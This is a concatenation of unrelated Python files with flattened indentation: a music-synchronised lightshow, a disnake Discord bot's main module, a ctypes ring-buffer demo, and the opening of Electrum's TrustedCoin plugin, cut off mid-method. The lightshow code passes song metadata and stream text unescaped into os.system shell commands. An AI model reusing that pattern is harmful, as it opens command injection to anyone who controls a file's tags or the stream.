print("Running in %s mode, use Ctrl+C to stop" % cm.lightshow.mode)
# setup light_delay.
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
matrix_buffer = deque([], 1000)
self.set_audio_device()
# Start with these as our initial guesses - will calculate a rolling mean / std
# as we get input data.
# preload running_stats to avoid errors, and give us a show that looks
# good right from the start
count = 2
running_stats = RunningStats.Stats(cm.hardware.gpio_len)
running_stats.preload(self.mean, self.std, count)
hc.initialize()
fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies,
1,
cm.audio_processing.use_gpu)
if self.server:
self.network.set_playing()
songcount = 0
# Listen on the audio input device until CTRL-C is pressed
while True:
if cm.lightshow.mode == 'stream-in':
try:
streamout = outq.get_nowait().strip(b'\n\r').decode("utf-8")
except Empty:
pass
else:
print(streamout)
if cm.lightshow.stream_song_delim in streamout:
songcount+=1
streamout = streamout.replace('\033[2K','')
streamout = streamout.replace(cm.lightshow.stream_song_delim,'')
streamout = streamout.replace('"','')
os.system("/bin/echo " + "Now Playing \"" + streamout + "\"" + " >" + cm.home_dir + "/logs/now_playing.txt")
if cm.lightshow.songname_command:
os.system(cm.lightshow.songname_command + ' "Now Playing ' + streamout + '"')
if cm.lightshow.stream_song_exit_count > 0 and songcount > cm.lightshow.stream_song_exit_count:
break
try:
data = stream_reader()
except OSError as err:
if err.errno == errno.EAGAIN or err.errno == errno.EWOULDBLOCK:
continue
# try:
# self.output(data)
# except aa.ALSAAudioError:
# continue
if len(data):
# if the maximum of the absolute value of all samples in
# data is below a threshold we will disregard it
audio_max = audioop.max(data, 2)
if audio_max < 250:
# we will fill the matrix with zeros and turn the lights off
matrix = np.zeros(cm.hardware.gpio_len, dtype="float32")
log.debug("below threshold: '" + str(audio_max) + "', turning the lights off")
else:
matrix = fft_calc.calculate_levels(data)
running_stats.push(matrix)
self.mean = running_stats.mean()
self.std = running_stats.std()
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > light_delay:
matrix = matrix_buffer[light_delay]
self.update_lights(matrix)
def load_custom_config(self):
"""
Load custom configuration settings for file config_filename
"""
"""
example usage
your song
carol-of-the-bells.mp3
First run your playlist (or single files) to create your sync files. This will
create a file in the same directory as your music file.
.carol-of-the-bells.mp3.cfg
DO NOT EDIT THE existing section [fft], it will cause your sync files to be ignored.
If you want to use an override you need to add the appropriate section
Then add the options you wish to use, but do not add an option you do not
want to use, as this will set that option to None and could crash your lightshow.
Look at defaults.cfg for exact usages of each option
[custom_lightshow]
always_on_channels =
always_off_channels =
invert_channels =
preshow_configuration =
preshow_script =
postshow_configuration =
postshow_script =
attenuate_pct =
[custom_audio_processing]
min_frequency =
max_frequency =
custom_channel_mapping =
custom_channel_frequencies =
Note: DO NOT EDIT THE existing section [fft]
Note: If you use any of the options in "custom_audio_processing" your sync files will be
automatically regenerated after every change. This is normal as your sync file needs
to match these new settings. After they have been regenerated you will see that they
now match the settings in [fft], and you will not have to regenerate them again unless
you make more changes.
Note: Changes made in "custom_lightshow" do not affect the sync files, so you will not need
to regenerate them after making changes.
"""
if os.path.isfile(self.config_filename):
config = configparser.RawConfigParser(allow_no_value=True)
with open(self.config_filename) as f:
config.read_file(f)
if config.has_section('custom_lightshow'):
lsc = "custom_lightshow"
always_on = "always_on_channels"
if config.has_option(lsc, always_on):
cm.lightshow.always_on_channels = map(int, config.get(lsc, always_on).split(","))
always_off = "always_off_channels"
if config.has_option(lsc, always_off):
cm.lightshow.always_off_channels = map(int, config.get(lsc, always_off).split(","))
inverted = "invert_channels"
if config.has_option(lsc, inverted):
cm.lightshow.inverted_channels = map(int, config.get(lsc, inverted).split(","))
attenuate = "attenuate_pct"
if config.has_option(lsc, attenuate):
self.attenuate_pct = float(config.get(lsc, attenuate))
# setup up custom preshow
has_preshow_configuration = config.has_option(lsc, 'preshow_configuration')
has_preshow_script = config.has_option(lsc, 'preshow_script')
if has_preshow_configuration or has_preshow_script:
preshow = None
try:
preshow_configuration = config.get(lsc, 'preshow_configuration')
except configparser.NoOptionError:
preshow_configuration = None
try:
preshow_script = config.get(lsc, 'preshow_script')
except configparser.NoOptionError:
preshow_script = None
if preshow_configuration and not preshow_script:
try:
preshow = json.loads(preshow_configuration)
except (ValueError, TypeError) as error:
msg = "Preshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(preshow_script):
preshow = preshow_script
cm.lightshow.preshow = preshow
# setup postshow
has_postshow_configuration = config.has_option(lsc, 'postshow_configuration')
has_postshow_script = config.has_option(lsc, 'postshow_script')
if has_postshow_configuration or has_postshow_script:
postshow = None
postshow_configuration = config.get(lsc, 'postshow_configuration')
postshow_script = config.get(lsc, 'postshow_script')
if postshow_configuration and not postshow_script:
try:
postshow = json.loads(postshow_configuration)
except (ValueError, TypeError) as error:
msg = "Postshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(postshow_script):
postshow = postshow_script
cm.lightshow.postshow = postshow
if config.has_section('custom_audio_processing'):
if config.has_option('custom_audio_processing', 'min_frequency'):
cm.audio_processing.min_frequency = \
config.getfloat('custom_audio_processing', 'min_frequency')
if config.has_option('custom_audio_processing', 'max_frequency'):
cm.audio_processing.max_frequency = \
config.getfloat('custom_audio_processing', 'max_frequency')
if config.has_option('custom_audio_processing', 'custom_channel_mapping'):
temp = config.get('custom_audio_processing', 'custom_channel_mapping')
cm.audio_processing.custom_channel_mapping = \
map(int, temp.split(',')) if temp else 0
if config.has_option('custom_audio_processing', 'custom_channel_frequencies'):
temp = config.get('custom_audio_processing', 'custom_channel_frequencies')
cm.audio_processing.custom_channel_frequencies = \
map(int, temp.split(',')) if temp else 0
def setup_audio(self):
"""Setup audio file
and setup the output. device.output is a lambda that will send data to
fm process or to the specified ALSA sound card
"""
# Set up audio
force_header = False
if any([ax for ax in [".mp4", ".m4a", ".m4b"] if ax in self.song_filename]):
force_header = True
self.music_file = decoder.open(self.song_filename, force_header)
self.sample_rate = self.music_file.getframerate()
self.num_channels = self.music_file.getnchannels()
self.fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies,
2,
cm.audio_processing.use_gpu)
# setup output device
self.set_audio_device()
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
self.light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
# Output a bit about what we're about to play to the logs
num_frames = str(self.music_file.getnframes() / self.sample_rate)
log.info("Playing: " + self.song_filename + " (" + num_frames + " sec)")
def setup_cache(self):
"""Setup the cache_matrix, std and mean
loading them from a file if it exists, otherwise create empty arrays to be filled
:raise IOError:
"""
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
self.cache_found = False
# The values 12 and 1.5 are good estimates for first time playing back
# (i.e. before we have the actual mean and standard deviations
# calculated for each channel).
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if args.readcache:
# Read in cached fft
try:
# compare configuration of cache file to current configuration
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if not self.cache_found:
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
raise IOError()
else:
# load cache from file using numpy loadtxt
self.cache_matrix = np.loadtxt(self.cache_filename)
# get std from matrix / located at index 0
self.std = np.array(self.cache_matrix[0])
# get mean from matrix / located at index 1
self.mean = np.array(self.cache_matrix[1])
# delete mean and std from the array
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
log.debug("std: " + str(self.std) + ", mean: " + str(self.mean))
except IOError:
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
msg = "Cached sync data song_filename not found: '"
log.warning(msg + self.cache_filename + "'. One will be generated.")
def save_cache(self):
"""
Save matrix, std, and mean to cache_filename for use during future playback
"""
# Compute the standard deviation and mean values for the cache
mean = np.empty(cm.hardware.gpio_len, dtype='float32')
std = np.empty(cm.hardware.gpio_len, dtype='float32')
for pin in range(0, cm.hardware.gpio_len):
std[pin] = np.std([item for item in self.cache_matrix[:, pin] if item > 0])
mean[pin] = np.mean([item for item in self.cache_matrix[:, pin] if item > 0])
# Add mean and std to the top of the cache
self.cache_matrix = np.vstack([mean, self.cache_matrix])
self.cache_matrix = np.vstack([std, self.cache_matrix])
# Save the cache using numpy savetxt
np.savetxt(self.cache_filename, self.cache_matrix)
# Save fft config
self.fft_calc.save_config()
cm_len = str(len(self.cache_matrix))
log.info("Cached sync data written to '." + self.cache_filename + "' [" + cm_len + " rows]")
log.info("Cached config data written to '." + self.fft_calc.config_filename)
def get_song(self):
"""
Determine the next file to play
:return: tuple containing 3 strings: song_filename, config_filename, cache_filename
:rtype: tuple
"""
play_now = int(cm.get_state('play_now', "0"))
song_to_play = int(cm.get_state('song_to_play', "0"))
self.song_filename = args.file
if args.playlist is not None and args.file is None:
most_votes = [None, None, []]
songs = cm.get_playlist(args.playlist)
for song in songs:
if len(song[2]) > 0:
if len(song[2]) >= len(most_votes[2]):
most_votes = song
if most_votes[0] is not None:
log.info("Most Votes: " + str(most_votes))
current_song = most_votes
# Update playlist with latest votes
for song in songs:
if current_song[0:3] == song[0:3] and len(song) == 3:
song.append("playing!")
# Update playlist file
cm.write_playlist(songs, args.playlist)
else:
# Get a "play now" requested song
if 0 < play_now <= len(songs):
current_song = songs[play_now - 1]
# Get random song
elif cm.lightshow.randomize_playlist:
current_song = songs[random.randrange(0, len(songs))]
# Play next song in the lineup
else:
if not (song_to_play <= len(songs) - 1):
song_to_play = 0
current_song = songs[song_to_play]
if (song_to_play + 1) <= len(songs) - 1:
next_song = (song_to_play + 1)
else:
next_song = 0
cm.update_state('song_to_play', str(next_song))
# Get filename to play and store the current song playing in state cfg
self.song_filename = current_song[1]
if (cm.fm.radio_text == "playlist"):
cm.fm.radio_text = current_song[0]
cm.update_state('current_song', str(songs.index(current_song)))
self.song_filename = self.song_filename.replace("$SYNCHRONIZED_LIGHTS_HOME", cm.home_dir)
filename = os.path.abspath(self.song_filename)
self.config_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".cfg"
self.cache_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".sync"
os.system("/bin/echo \"\" >" + cm.home_dir + "/logs/now_playing.txt")
metadata = mutagen.File(self.song_filename, easy=True)
if metadata is not None:
if "title" in metadata and "artist" in metadata:
now_playing = "Now Playing " + metadata["title"][0] + " by " + metadata["artist"][0]
elif "title" in metadata:
now_playing = "Now Playing " + metadata["title"][0]
else:
now_playing = "Now Playing Unknown"
if cm.lightshow.songname_command:
os.system(cm.lightshow.songname_command + " \"" + now_playing + "\"")
else:
now_playing = "Now Playing " + os.path.basename(self.song_filename)
os.system("/bin/echo " + " \"" + now_playing + "\"" + " >" + cm.home_dir + "/logs/now_playing.txt")
def play_song(self):
"""Play the next song from the play list (or --file argument)."""
# get the next song to play
self.get_song()
# load custom configuration from file
self.load_custom_config()
# Initialize Lights
self.network.set_playing()
hc.initialize()
# Handle the pre/post show
play_now = int(cm.get_state('play_now', "0"))
self.network.unset_playing()
if not play_now:
result = PrePostShow('preshow', hc).execute()
if result == PrePostShow.play_now_interrupt:
play_now = int(cm.get_state('play_now', "0"))
self.network.set_playing()
# Ensure play_now is reset before beginning playback
if play_now:
cm.update_state('play_now', "0")
play_now = 0
# setup audio file and output device
self.setup_audio()
# setup our cache_matrix, std, mean
self.setup_cache()
matrix_buffer = deque([], 1000)
# Process the audio file
row = 0
data = self.music_file.readframes(self.chunk_size)
if args.createcache:
total_frames = self.music_file.getnframes() / 100
counter = 0
percentage = 0
while data != b'':
# Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
data = self.music_file.readframes(self.chunk_size)
if counter > total_frames:
percentage += 1
counter = 0
counter += self.chunk_size
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename,
percentage))
sys.stdout.flush()
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename, 100))
sys.stdout.flush()
data = b''
self.cache_found = False
play_now = False
print("\nsaving sync file")
while data != b'' and not play_now:
# output data to sound device
self.output(data)
# Control lights with cached timing values if they exist
matrix = None
if self.cache_found and args.readcache:
if row < len(self.cache_matrix):
matrix = self.cache_matrix[row]
else:
log.warning("Ran out of cached FFT values, will update the cache.")
self.cache_found = False
if matrix is None:
# No cache - Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > self.light_delay:
matrix = matrix_buffer[self.light_delay]
self.update_lights(matrix)
# Read next chunk of data from the music file
data = self.music_file.readframes(self.chunk_size)
row += 1
# Load new application state in case we've been interrupted
cm.load_state()
play_now = int(cm.get_state('play_now', "0"))
if not self.cache_found and not play_now:
self.save_cache()
# Cleanup the pifm process
if cm.fm.enabled:
self.fm_process.kill()
# check for postshow
self.network.unset_playing()
if not play_now:
PrePostShow('postshow', hc).execute()
# We're done, turn it all off and clean up things ;)
hc.clean_up()
def network_client(self):
"""Network client support
If in client mode, ignore everything else and just
read data from the network and blink the lights
"""
log.info("Network client mode starting")
print("Network client mode starting...")
print("press CTRL<C> to end")
hc.initialize()
print()
try:
channels = self.network.channels
channel_keys = channels.keys()
while True:
data = self.network.receive()
if hc.led and isinstance(data[0], np.ndarray):
for led_instance in hc.led:
led_instance.write_all(data[0])
if isinstance(data[0], int):
pin = data[0]
if pin in channel_keys:
hc.set_light(channels[pin], True, float(data[1]))
continue
elif isinstance(data[0], np.ndarray):
brightness_levels = data[0]
else:
continue
for pin in channel_keys:
hc.set_light(channels[pin], True, brightness_levels[pin])
except KeyboardInterrupt:
log.info("CTRL<C> pressed, stopping")
print("stopping")
self.network.close_connection()
hc.clean_up()
def launch_curses(self, screen):
self.terminal.init(screen)
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
if __name__ == "__main__":
if args.log:
level = levels.get(args.log.upper())
elif cm.lightshow.log_level != "":
level = levels.get(cm.lightshow.log_level.upper())
else:
level = levels.get('INFO')
log.getLogger().setLevel(level)
# Make sure one of --playlist or --file was specified
if args.file is None and args.playlist is None:
print("One of --playlist or --file must be specified")
sys.exit()
lightshow = Lightshow()
if "-in" in cm.lightshow.mode:
lightshow.audio_in()
elif lightshow.client:
lightshow.network_client()
else:
lightshow.play_song()
|
main.py
|
## -- IMPORTING -- ##
# MODULE
import multiprocessing
import os
import datetime
import certifi
import disnake
import json
import time
import logging
from disnake.ext import commands
from pymongo import MongoClient
from dotenv import load_dotenv
from threading import Thread
# FILES
from extra import functions
from extra import config
from app import run_api
## -- VARIABLES / FUNCTIONS -- ##
load_dotenv()
# LOGGERS
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("disnake")
logger.setLevel(logging.INFO)
handler = logging.FileHandler(filename='disnake.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
# TOKENS
bot_token = str(os.environ.get("BOT_TOKEN"))
test_bot_token = str(os.environ.get("TEST_BOT_TOKEN"))
mongo_token = os.environ.get("MONGO_LOGIN")
api_key = os.environ.get("API_KEY")
# DATABASE VARIABLES
client = MongoClient(f"{mongo_token}", tlsCAFile=certifi.where())
db = client[config.database_collection]
prefixes_col = db["prefixes"]
confirmations_col = db["bot_farm_confirmations"]
server_data_col = db["server_data"]
# IMPORTANT FUNCTIONS
def get_prefix(bot, message: disnake.Message):
query = {"guild_id": str(message.guild.id)}
data = functions.get_db_data(message.guild.id)
result = server_data_col.find_one(query)
if not result:
server_data_col.insert_one(data)
return commands.when_mentioned_or(config.default_prefix)(bot, message)
elif not result.get("prefix"):
server_data_col.update_one(query, {"$set": {"prefix": "?"}})
return commands.when_mentioned_or(config.default_prefix)(bot, message)
return commands.when_mentioned_or(result["prefix"])(bot, message)
async def load_cogs(bot: commands.Bot):
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py"): continue
file = file[:-3]
try:
bot.load_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
print("Loaded all commands.")
# BOT
class Bot(commands.Bot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.launch_time = datetime.datetime.utcnow()
async def on_ready(self):
self.avatar = await self.user.avatar.read()
status_channel = self.get_channel(config.messages_channel)
embed = disnake.Embed(title=f"Singed In As: {bot.user.name} ({bot.user.id})",
description=f"Bot started in `{str(len(bot.guilds))}` servers, with total of `{len(bot.users)}` users, on an average latency of `{round(bot.latency * 1000)} ms`.",
color=config.success_embed_color)
await status_channel.send(embed=embed)
print(f"Bot started on {'the server' if config.is_server else 'a local computer'}. Stats: {len(bot.guilds)} servers, {len(bot.users)} users.")
with open("data/stats.json", 'w') as f:
json.dump({"commands_run": 0}, f)
async def load_cogs(self, specific_cog: str = None):
if not specific_cog:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py"): return
file = file[:-3]
try:
self.load_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
print("Loaded all commands.")
else:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py") or file[:-3] != specific_cog: return
file = file[:-3]
try:
self.load_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
async def unload_cogs(self, specific_cog: str = None):
if not specific_cog:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py"): return
file = file[:-3]
try:
self.unload_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
else:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py") or file[:-3] != specific_cog: return
file = file[:-3]
try:
self.unload_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
def get_bot_prefix(self, guild_id: int) -> str:
query = {"guild_id" : str(guild_id)}
data = functions.get_db_data(guild_id)
update = { "$set": { "guild_id" : str(guild_id), "prefix" : "?" } }
result = server_data_col.find_one(filter=query, limit=1)
if not result or not result["prefix"]:
if not result:
server_data_col.insert_one(data)
elif result and not result["prefix"]:
server_data_col.update_one(query, update)
return server_data_col.find_one(query)["prefix"]
def change_prefix(self, guild_id: int, new_prefix: str) -> str:
query = {"guild_id" : str(guild_id)}
data = functions.get_db_data(guild_id)
update = { "$set": { "guild_id" : str(guild_id), "prefix" : "?" } }
result = server_data_col.find_one(filter=query, limit=1)
if not result:
server_data_col.insert_one(data)
else:
server_data_col.update_one(filter=query, update=update)
result = self.get_bot_prefix(guild_id)
if result == new_prefix:
return result
else:
return False
bot = Bot(
command_prefix=get_prefix,
intents=disnake.Intents.all(),
status=disnake.Status.idle,
activity=disnake.Game(name="booting up.."),
case_insensitive=True,
# test_guilds=[int(config.bot_server)],
sync_permissions=True
)
## -- COGS -- ##
@bot.slash_command(name="cogs", description="Manages the bot's cogs.", default_permission=False, guild_ids=[config.bot_server])
@commands.guild_permissions(guild_id=int(config.bot_server), roles={871899070283800636: True})
async def cogs(inter):
pass
@cogs.sub_command(name="load", description="Load a specific cog.")
async def loadcog(inter, cog: str):
try:
await inter.response.defer()
except Exception:
pass
await bot.load_cogs(cog)
embed = disnake.Embed(description=f"{config.yes} Loaded `{cog}` successfully.", color=config.success_embed_color)
try:
await inter.send(embed=embed, ephemeral=True)
except Exception:
pass
@cogs.sub_command_group(name="reload")
async def reload(inter):
pass
@reload.sub_command(name="all", description="Reload all cogs.")
async def reloadcogs(inter):
try:
await inter.response.defer()
except Exception:
pass
await bot.unload_cogs()
await bot.load_cogs()
embed = disnake.Embed(description=f"{config.yes} Reloaded all cogs successfully.", color=config.success_embed_color)
try:
await inter.send(embed=embed, ephemeral=True)
except Exception:
pass
@reload.sub_command(name="cog", description="Reload one specific cog.")
async def reloadcog(inter, cog: str):
try:
await inter.response.defer()
except Exception:
pass
await bot.unload_cogs(cog)
await bot.load_cogs(cog)
embed = disnake.Embed(description=f"{config.yes} Reloaded `{cog}` successfully.", color=config.success_embed_color)
try:
await inter.send(embed=embed, ephemeral=True)
except Exception:
pass
@bot.command(hidden=True)
async def reloadcogs(ctx: commands.Context):
if ctx.author.id not in config.owners:
return
await bot.unload_cogs()
await bot.load_cogs()
embed = disnake.Embed(description=f"{config.yes} Reloaded all cogs successfully.", color=config.success_embed_color)
await ctx.send(embed=embed)
## -- RUNNING BOT -- ##
if __name__ == "__main__":
if not config.is_server:
Thread(target=run_api).start()
bot.loop.create_task(bot.load_cogs())
bot.run(bot_token if config.is_server else test_bot_token)
|
example_ctypes.py
|
#!/usr/bin/env python3
"""Simple example with ctypes.Structures."""
import ctypes
import multiprocessing
import os
import random
import time
from context import ringbuffer
class Record(ctypes.Structure):
_fields_ = [
('write_number', ctypes.c_uint),
('timestamp_microseconds', ctypes.c_ulonglong),
('length', ctypes.c_uint),
('data', ctypes.c_ubyte * 1000),
]
def writer(ring, start, count):
for i in range(start, start + count):
data = os.urandom(random.randint(1, 1000))
time_micros = int(time.time() * 10**6)
record = Record(
write_number=i,
timestamp_microseconds=time_micros,
length=len(data))
# Note: You can't pass 'data' to the constructor without doing an
# additional copy to convert the bytes type to a c_ubyte * 1000. So
# instead, the constructor will initialize the 'data' field's bytes
# to zero, and then this assignment overwrites the data-sized part.
record.data[:len(data)] = data
try:
ring.try_write(record)
except ringbuffer.WaitingForReaderError:
print('Reader is too slow, dropping %d' % i)
continue
if i and i % 100 == 0:
print('Wrote %d so far' % i)
ring.writer_done()
print('Writer is done')
def reader(ring, pointer):
while True:
try:
data = ring.blocking_read(pointer)
except ringbuffer.WriterFinishedError:
return
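# Interpret the slot's raw bytes in place as a Record structure (from_buffer makes no copy).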
record = Record.from_buffer(data)
if record.write_number and record.write_number % 100 == 0:
print('Reader %s saw record %d at timestamp %d with %d bytes' %
(id(pointer), record.write_number,
record.timestamp_microseconds, record.length))
print('Reader %r is done' % id(pointer))
def main():
ring = ringbuffer.RingBuffer(slot_bytes=50000, slot_count=10)
ring.new_writer()
processes = [
multiprocessing.Process(target=reader, args=(ring, ring.new_reader())),
multiprocessing.Process(target=reader, args=(ring, ring.new_reader())),
multiprocessing.Process(target=writer, args=(ring, 1, 1000)),
]
for p in processes:
p.daemon = True
p.start()
for p in processes:
p.join(timeout=20)
assert not p.is_alive()
assert p.exitcode == 0
if __name__ == '__main__':
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import os
import json
import base64
import time
import hashlib
from urllib.parse import urljoin
from urllib.parse import quote
from electrum import bitcoin, ecc, constants, keystore, version
from electrum.bitcoin import *
from electrum.transaction import TxOutput
from electrum.mnemonic import Mnemonic
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, make_aiohttp_session
from electrum.storage import STO_EV_USER_PW
from electrum.network import Network
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None, headers=None):
network = Network.get_instance()
if network:
return asyncio.run_coroutine_threadsafe(self._send_request(method, relative_url, data, headers), network.asyncio_loop).result()
else:
raise ErrorConnectingServer('You are offline.')
async def handle_response(self, resp):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
async def _send_request(self, method, relative_url, data, headers=None):
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
headers = dict(headers) if headers else {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
proxy = Network.get_instance().proxy
async with make_aiohttp_session(proxy) as session:
if method == 'get':
async with session.get(url, params=data, headers=headers) as resp:
return await self.handle_response(resp)
elif method == 'post':
async with session.post(url, json=data, headers=headers) as resp:
return await self.handle_response(resp)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
